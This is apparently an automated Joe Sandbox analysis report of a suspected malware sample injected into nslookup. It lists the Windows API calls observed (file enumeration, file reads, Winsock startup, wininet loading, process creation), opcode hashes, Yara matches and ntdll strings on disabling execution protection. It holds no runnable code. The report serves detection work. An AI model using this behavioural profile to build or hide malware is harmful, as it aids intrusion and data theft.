                                  • String ID: 0$0
                                  • API String ID: 3446177414-203156872
                                  • Opcode ID: a89b3a65c8d75e3eb6bf23f11269577abf98a97d390feb5f71d9ad838356c8b7
                                  • Instruction ID: 6211ac86131617544089d027f2c14909511204c50bfb1bc5f4c8fa079af9f290
                                  • Opcode Fuzzy Hash: a89b3a65c8d75e3eb6bf23f11269577abf98a97d390feb5f71d9ad838356c8b7
                                  • Instruction Fuzzy Hash: CB415BB1A087069FD321CF2CC884A1ABBE5FB89314F04496EF588DB341D771E905CB96

                                  Execution Graph

                                  Execution Coverage:2.3%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:1.7%
                                  Total number of Nodes:417
                                  Total number of Limit Nodes:67
                                  APIs
                                  • FindFirstFileW.KERNELBASE(?,00000000), ref: 02A6BE14
                                  • FindNextFileW.KERNELBASE(?,00000010), ref: 02A6BE4F
                                  • FindClose.KERNELBASE(?), ref: 02A6BE5A
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_2a50000_nslookup.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNext
                                  • String ID:
                                  • API String ID: 3541575487-0
                                  • Opcode ID: 60e6a619f792cef91ebf149339725841f93ac0b32b861d3016797f44164373a4
                                  • Instruction ID: d5e8ea49a5c197fc0c41a5f9a2df2725c3a727d8ad4bdc70faca75922bde60be
                                  • Opcode Fuzzy Hash: 60e6a619f792cef91ebf149339725841f93ac0b32b861d3016797f44164373a4
                                  • Instruction Fuzzy Hash: 193185B1A402087BDB20DFA0CD89FFB777DDB44708F104958BA08A7180DF70AA848FA4
                                  APIs
                                  • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02A77D06
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_2a50000_nslookup.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: 67a721143b256440e831d564b0d7793f7d5f17e52658368adcef45d5e45fa654
                                  • Instruction ID: 4d3118b6b994ebd22757d15d258e453ee8884c61d767ee4b7cfb983778c7a028
                                  • Opcode Fuzzy Hash: 67a721143b256440e831d564b0d7793f7d5f17e52658368adcef45d5e45fa654
                                  • Instruction Fuzzy Hash: 7A31B6B5A01609AFDB14DF99DD80EEFB7B9AF8C314F108209F918A3340D630A9518FA5
                                  APIs
                                  • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02A77E4B
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_2a50000_nslookup.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID:
                                  • API String ID: 2738559852-0
                                  • Opcode ID: 517a152bc145fa57b29874357ceeac8f32e24082e5f23f503d14a93beed75fde
                                  • Instruction ID: 90cf7810e6e6f7a8e631cf17bfaf77ebb31ac4031f22043e81a438ee3db2f902
                                  • Opcode Fuzzy Hash: 517a152bc145fa57b29874357ceeac8f32e24082e5f23f503d14a93beed75fde
                                  • Instruction Fuzzy Hash: 9C31D7B5A00609AFDB14DF59DC80EEFB7B9AF8C314F10810AFD18A7240DA74A8518FA4
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_2a50000_nslookup.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: DeleteFile
                                  • String ID:
                                  • API String ID: 4033686569-0
                                  • Opcode ID: 6be9dd698a6aa441e71430c4d7cb1b7bce284cac8f05ca31d9d699f9b2c457d0
                                  • Instruction ID: 75c824471c22e0b850e91d396158a5ffbce27987ea5957e92b1d8289db1478ea
                                  • Opcode Fuzzy Hash: 6be9dd698a6aa441e71430c4d7cb1b7bce284cac8f05ca31d9d699f9b2c457d0
                                  • Instruction Fuzzy Hash: 9F016D72A506047FE624EB64DC45FEB77AEDF85710F40840AFA08A7181DAB579018BA9
                                  APIs
                                  • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02A77F37
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_2a50000_nslookup.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: e6daa042e966176be579df3f9ff239f27a5e42b93ad2f04772bb9893fb58ab0a
                                  • Instruction ID: 5a581616cd673bce202d2bcb487932d8b1ce2b87d2b3a8f4bdc20c72277079eb
                                  • Opcode Fuzzy Hash: e6daa042e966176be579df3f9ff239f27a5e42b93ad2f04772bb9893fb58ab0a
                                  • Instruction Fuzzy Hash: 2AE04F352502547FD110AB59DC01FDB776EDFC5754F404015FA08A7141C6B1790087E4
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp, Offset: 03180000, based on PE: true
                                  • Associated: 00000005.00000002.4540148046.00000000032A9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000005.00000002.4540148046.00000000032AD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_3180000_nslookup.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 60045edc07c433c298f496e5b627345eef94d6aeccf15d7bf43a51a617abd450
                                  • Instruction ID: 899bbdf2691a071a24707cf3232883afe4a4d53a97e11ad50d48b74636d89915
                                  • Opcode Fuzzy Hash: 60045edc07c433c298f496e5b627345eef94d6aeccf15d7bf43a51a617abd450
                                  • Instruction Fuzzy Hash: D2900231615C04529240B1584884547400597E0301B55C011E1425598D8B148A9A5361

                                  Control-flow Graph

                                  APIs
                                  • PostThreadMessageW.USER32(7--93mK-,00000111,00000000,00000000), ref: 02A60A67
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_2a50000_nslookup.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID: 7--93mK-$7--93mK-
                                  • API String ID: 1836367815-3783969520
                                  • Opcode ID: 16f942cfa84dcd9569b7b71f38dd61e2eb33cde37907f254f77ac44f81370d8c
                                  • Instruction ID: 0d36b58ae2278208b718ee5f8ff9579aa86c0a75ace3e7e82c234fad47a1a3c6
                                  • Opcode Fuzzy Hash: 16f942cfa84dcd9569b7b71f38dd61e2eb33cde37907f254f77ac44f81370d8c
                                  • Instruction Fuzzy Hash: F311CEB2D4120C7ADB11ABA48D81EFFBB7DEB40394F008064FA04A7140DA395E068BF1

                                  Control-flow Graph

                                  APIs
                                  • PostThreadMessageW.USER32(7--93mK-,00000111,00000000,00000000), ref: 02A60A67
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_2a50000_nslookup.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID: 7--93mK-$7--93mK-
                                  • API String ID: 1836367815-3783969520
                                  • Opcode ID: 5ad0d07882de5479840eda401505350111dc8c2f41be99223ca5d76a412ff8fb
                                  • Instruction ID: cfa33526d617a3ac42932a545c0fd8bbf22c608710b08ac2c327ff8d92be8e67
                                  • Opcode Fuzzy Hash: 5ad0d07882de5479840eda401505350111dc8c2f41be99223ca5d76a412ff8fb
                                  • Instruction Fuzzy Hash: 8001C4B1D4024C7ADB11A7E08D81EFFBB7CDF40294F048065FA0467140DA385E068BB5

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 577 2a609dc-2a609de 578 2a609e0-2a609e7 577->578 579 2a60a3e-2a60a5a 577->579 578->579 580 2a60a5c-2a60a6b PostThreadMessageW 579->580 581 2a60a7a-2a60a80 579->581 580->581 582 2a60a6d-2a60a77 580->582 582->581
                                  APIs
                                  • PostThreadMessageW.USER32(7--93mK-,00000111,00000000,00000000), ref: 02A60A67
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_2a50000_nslookup.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID: 7--93mK-$7--93mK-
                                  • API String ID: 1836367815-3783969520
                                  • Opcode ID: 24abfe0573eac7b940e217813fcc710d0e29d24c1cb178ef7aac01b434065fba
                                  • Instruction ID: aba2b236b6b3898af388bc5b3e168f4e8237ccce3b45c8005fdea0152eef8c4d
                                  • Opcode Fuzzy Hash: 24abfe0573eac7b940e217813fcc710d0e29d24c1cb178ef7aac01b434065fba
                                  • Instruction Fuzzy Hash: 29F0AE77E0014C7A5B11C7D5ACC19FDFB7CEA50194B0081A6ED18E7140D7364D4147A1
                                  APIs
                                  • Sleep.KERNELBASE(000007D0), ref: 02A72B2B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_2a50000_nslookup.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID: net.dll$wininet.dll
                                  • API String ID: 3472027048-1269752229
                                  • Opcode ID: 50cbb292f3f5e4bf982e972e723b78504892de27675a4cd2942ae41bc8b9bdf6
                                  • Instruction ID: 2c5728b3000a3274d543d5b9fcf59a2b270f4aabfea1c5fde73211c496fce12a
                                  • Opcode Fuzzy Hash: 50cbb292f3f5e4bf982e972e723b78504892de27675a4cd2942ae41bc8b9bdf6
                                  • Instruction Fuzzy Hash: E1316CB1640705ABC724DF64DC84FE7BBB9EB88710F00852DEA5D5B241D770BA44CBA8
                                  APIs
                                  • FindNextFileW.KERNELBASE(?,00000010), ref: 02A6BE4F
                                  • FindClose.KERNELBASE(?), ref: 02A6BE5A
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_2a50000_nslookup.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$CloseFileNext
                                  • String ID:
                                  • API String ID: 2066263336-0
                                  • Opcode ID: 4805fe4c81b7ff940da2359e3a145ed00e83533085aea2788a192e43205fae25
                                  • Instruction ID: bd53e421fc813ee2fc2587ac0ef4c96f6722d8a410bcfa81e2d6e50635bb3001
                                  • Opcode Fuzzy Hash: 4805fe4c81b7ff940da2359e3a145ed00e83533085aea2788a192e43205fae25
                                  • Instruction Fuzzy Hash: C8419671614686AFDB00DF74C889AFABF79FF46618B4808DED940DB522CB308941CBB1
                                  APIs
                                  • CoInitialize.OLE32(00000000), ref: 02A6EAF7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_2a50000_nslookup.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Initialize
                                  • String ID: @J7<
                                  • API String ID: 2538663250-2016760708
                                  • Opcode ID: 2b9c7ccdea0b5213595e6bca5b0a33fab94d937af711388513589fa2b7811775
                                  • Instruction ID: d64a078b7e3efcfa192ba2e4042a716315412bf5fb9620be0ab0fcc3a402cfb0
                                  • Opcode Fuzzy Hash: 2b9c7ccdea0b5213595e6bca5b0a33fab94d937af711388513589fa2b7811775
                                  • Instruction Fuzzy Hash: C2313276A0020AAFDB00DFD8D880DEFB7B9FF48304B108559E515EB214DB75EE458BA0
                                  APIs
                                  • CoInitialize.OLE32(00000000), ref: 02A6EAF7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_2a50000_nslookup.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Initialize
                                  • String ID: @J7<
                                  • API String ID: 2538663250-2016760708
                                  • Opcode ID: 543d971038487359dff5b5610849bd2c9d78b3619237ffd184eeb5d254223677
                                  • Instruction ID: 0dcac35e2cdcca18274cac67b674d7483c1095155a49660cfdc3f2dcd8f748a7
                                  • Opcode Fuzzy Hash: 543d971038487359dff5b5610849bd2c9d78b3619237ffd184eeb5d254223677
                                  • Instruction Fuzzy Hash: 8F311275A0060A9FDB00DFD8C880DEFB7B9FF48304B108559E515EB214DB75AE458BA0
                                  APIs
                                  • WSAStartup.WS2_32(00000202,?), ref: 02A618A1
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_2a50000_nslookup.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Startup
                                  • String ID:
                                  • API String ID: 724789610-0
                                  • Opcode ID: cc15fe335a8fc3bcbbfcf81d3a2545b3913cf7b55dd76b06a3d7e74545ac358e
                                  • Instruction ID: cec20fb0394e3c7014032d45e625ed213a29be209a011113e5e6c7518c46cf95
                                  • Opcode Fuzzy Hash: cc15fe335a8fc3bcbbfcf81d3a2545b3913cf7b55dd76b06a3d7e74545ac358e
                                  • Instruction Fuzzy Hash: 889180B1D40209EFDB14DFA5CD84BEEBBF9AF08304F14412AE508A7281EB706645CFA5
                                  APIs
                                  • WSAStartup.WS2_32(00000202,?), ref: 02A618A1
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_2a50000_nslookup.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Startup
                                  • String ID:
                                  • API String ID: 724789610-0
                                  • Opcode ID: ffcb588778199ee2a05fc759837fda0f3521b9bd603dcf2a099f4504a5d03b3f
                                  • Instruction ID: 9ff255578303445ac912d85ad755b544b2b9fbbb921aa82a9c86e7585081ffaf
                                  • Opcode Fuzzy Hash: ffcb588778199ee2a05fc759837fda0f3521b9bd603dcf2a099f4504a5d03b3f
                                  • Instruction Fuzzy Hash: 4E9180B1D40209EFDB10DFA5CD85BEEBBB9BF08304F14412AE508A7281EB706655CFA5
                                  APIs
                                  • WSAStartup.WS2_32(00000202,?), ref: 02A618A1
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_2a50000_nslookup.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Startup
                                  • String ID:
                                  • API String ID: 724789610-0
                                  • Opcode ID: ecd1ee86b8d6e57b68b2a19455a759178b9cb642bf5dc3b5c2a2924c7803aa07
                                  • Instruction ID: e8e9258738364d65e4f6ada7d65ee8e32d3b51b52bc2683f6ebd0f46e2699f29
                                  • Opcode Fuzzy Hash: ecd1ee86b8d6e57b68b2a19455a759178b9cb642bf5dc3b5c2a2924c7803aa07
                                  • Instruction Fuzzy Hash: 4A11B271D41319AFDB11DBA48D81BEFB7F8AF09300F040056EA08B3241EB316A488BA9
                                  APIs
                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02A597D5
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_2a50000_nslookup.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateThread
                                  • String ID:
                                  • API String ID: 2422867632-0
                                  • Opcode ID: b1f595f578e307b48e0e17b424240cdacd0a21a8e28d101fa833eeb776dd6a8d
                                  • Instruction ID: 6653862497eb43a70965a946a6bba104d5ff9871b4e71afe983f38ba1e8201b0
                                  • Opcode Fuzzy Hash: b1f595f578e307b48e0e17b424240cdacd0a21a8e28d101fa833eeb776dd6a8d
                                  • Instruction Fuzzy Hash: FC01D472681718B6E32166A48D43FEB7B6CCF41754F104056FA0CAA1C1DEB176414BE9
                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02A64402
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_2a50000_nslookup.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: c637b0a5039fee39120ea626e6d6813652200ddffb7808a4ed43236f6d148d2f
                                  • Instruction ID: 5d15c73672ef3867b89fd4342ccffbc2aef355b632546626003befdc35a756d9
                                  • Opcode Fuzzy Hash: c637b0a5039fee39120ea626e6d6813652200ddffb7808a4ed43236f6d148d2f
                                  • Instruction Fuzzy Hash: E2015EB5E4020DBBDB10EBE0ED85FEEB3B99B14308F0041A5E90897241FA30EB14CB91
                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(?,?,?,?,02A67C23,00000010,?,?,?,00000044,?,00000010,02A67C23,?,?,?), ref: 02A78353
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_2a50000_nslookup.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: 76313abf0d2183b6971281bcfa7a408c7bd84f0fbd4479c675105112f473c24a
                                  • Instruction ID: 64e032494f741811d3fb74cdd7a0b5e317836a08eeec1ce5b1d97d19222f8f88
                                  • Opcode Fuzzy Hash: 76313abf0d2183b6971281bcfa7a408c7bd84f0fbd4479c675105112f473c24a
                                  • Instruction Fuzzy Hash: 0D0184B2204108BFCB54DE99DC80EEB77AEAF8C754F418108BA19D3240DA30F8518BA4
                                  APIs
                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02A597D5
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_2a50000_nslookup.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateThread
                                  • String ID:
                                  • API String ID: 2422867632-0
                                  • Opcode ID: 95d7893bed7c4f881b3b89ea5b4bb853f94a2da6a27fad6951c0abd0fff2134f
                                  • Instruction ID: 10e0a491d95c28f7d7cabe81328f508b5634b262ac83a8256ad8c52a39c018f5
                                  • Opcode Fuzzy Hash: 95d7893bed7c4f881b3b89ea5b4bb853f94a2da6a27fad6951c0abd0fff2134f
                                  • Instruction Fuzzy Hash: 55F039B338061476E23066A99D42FD7A79D8B80BA1F14042AFA0CEA180D9A2B54146E9
                                  APIs
                                  • RtlAllocateHeap.NTDLL(02A61609,?,02A74E2B,02A61609,02A74577,02A74E2B,?,02A61609,02A74577,00001000,?,?,02A79A80), ref: 02A7824F
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_2a50000_nslookup.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: 8fc0493a6e8bee40a610767ea931887b664697431e711198148b16c4f16402e4
                                  • Instruction ID: 302d02f98137c01b3e7dffa6d999af64046667c88022f09d0a61228fff672faf
                                  • Opcode Fuzzy Hash: 8fc0493a6e8bee40a610767ea931887b664697431e711198148b16c4f16402e4
                                  • Instruction Fuzzy Hash: 18E065B22402057FD610EE99DC41FAB33AEEFC9750F004019F909A7240CAB1B9108AB9
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,00000ADC,00000007,00000000,00000004,00000000,02A63C78,000000F4,?,?,?,?,?), ref: 02A7829C
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_2a50000_nslookup.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID:
                                  • API String ID: 3298025750-0
                                  • Opcode ID: ebd85f2aa228cf2bf1eefa713117c3bd037453a5f3ab9d526bc395588c7853d4
                                  • Instruction ID: 29209592e6d9414c3532a0ad3dd80a9e73d9d63aa01511d6b3e360d25e17de65
                                  • Opcode Fuzzy Hash: ebd85f2aa228cf2bf1eefa713117c3bd037453a5f3ab9d526bc395588c7853d4
                                  • Instruction Fuzzy Hash: DEE065B26142147FDA10EE58DC40FAB37AEEFC8790F008009FA08A7240CA71BD108AB8
                                  APIs
                                  • SetErrorMode.KERNELBASE(00008003,?,?,02A618E0,02A76C97,02A74577,?), ref: 02A67AA3
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_2a50000_nslookup.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: 0f4a2dbd57145b77c30f811737ff4f730e49110cc5a57daae660f2b8c464bb5f
                                  • Instruction ID: 33bf20d29c117537afb5d80d015493e749aa95e689eaae915bbe83800184f57f
                                  • Opcode Fuzzy Hash: 0f4a2dbd57145b77c30f811737ff4f730e49110cc5a57daae660f2b8c464bb5f
                                  • Instruction Fuzzy Hash: 2BD05EB13D02083FF610E7B4CD06F66328D8B40768F048068FA0CDB2C2EE66F20046A9
                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02A64402
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_2a50000_nslookup.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: 9a64fc1e66d337bad59ad5524a175d7d14ceeaed205581d9aa7de55f04977df5
                                  • Instruction ID: 352b51974925f5f985a005499144ae562d1be6a5cd4173cbc5b8ddfbaca47f5c
                                  • Opcode Fuzzy Hash: 9a64fc1e66d337bad59ad5524a175d7d14ceeaed205581d9aa7de55f04977df5
                                  • Instruction Fuzzy Hash: FFE04F79A4000EABDF10CBD5D895FADB774AB48208F0441D1E818D7540EA30E604CB51
                                  APIs
                                  • GetFileAttributesW.KERNELBASE ref: 02A67C8C
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_2a50000_nslookup.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  • Opcode ID: 564aa035bb14cd579d8a35bac1d316f849c36bbd2026ac6a66d21791aefd520a
                                  • Instruction ID: e24e109181f4d1b44d82a682d560f876bf933935260772e3c909a997b900231f
                                  • Opcode Fuzzy Hash: 564aa035bb14cd579d8a35bac1d316f849c36bbd2026ac6a66d21791aefd520a
                                  • Instruction Fuzzy Hash: A4C08C3223000804FB200AFC7C8C2B37349DB8233CF240E10F42CD94E0D72298A79000
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp, Offset: 03180000, based on PE: true
                                  • Associated: 00000005.00000002.4540148046.00000000032A9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000005.00000002.4540148046.00000000032AD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_3180000_nslookup.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: ad71bb8a76b499affd181d1f04ddf9e0239cd54e946aa8c5b7e04444d2d7ebe2
                                  • Instruction ID: bf08d1b50299be56280ff4406c89829906d66f1fa406e992ca859a563914d768
                                  • Opcode Fuzzy Hash: ad71bb8a76b499affd181d1f04ddf9e0239cd54e946aa8c5b7e04444d2d7ebe2
                                  • Instruction Fuzzy Hash: F1B092729029C9CAEB11E7604A08B1B7A04ABD0701F2AC4A2E3030686F4739C1D6E2B6
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp, Offset: 03180000, based on PE: true
                                  • Associated: 00000005.00000002.4540148046.00000000032A9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000005.00000002.4540148046.00000000032AD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_3180000_nslookup.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: 5b730e9856eca000c4ff40c84c2e99bbfebbe015395699584cb1eef81ade7e35
                                  • Instruction ID: 146cd35b8996281625afbb0104b495eafd71b5c1c046e7c9739b86905ac6da67
                                  • Opcode Fuzzy Hash: 5b730e9856eca000c4ff40c84c2e99bbfebbe015395699584cb1eef81ade7e35
                                  • Instruction Fuzzy Hash: 2C5117BAA00266BFCB10DB988C8097FFBF8BB0C2017148569E565D7641D774DE918BE0
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp, Offset: 03180000, based on PE: true
                                  • Associated: 00000005.00000002.4540148046.00000000032A9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000005.00000002.4540148046.00000000032AD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_3180000_nslookup.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: cbe8471d8823d169fc927c3a1e7c9cb70c28ee7e08215fc0ec82fb6512ec8f85
                                  • Instruction ID: f58bcc0455b6e6808276a88f5a920f156dd36e6ab4868d7ef8340fe3a74c681b
                                  • Opcode Fuzzy Hash: cbe8471d8823d169fc927c3a1e7c9cb70c28ee7e08215fc0ec82fb6512ec8f85
                                  • Instruction Fuzzy Hash: 8351D479A10746EFDB34DE9CC89097FBBB9AF48201B048C59E4A5D7681E7B4DAC08760
                                  Strings
                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 032246FC
                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03224655
                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03224742
                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03224725
                                  • ExecuteOptions, xrefs: 032246A0
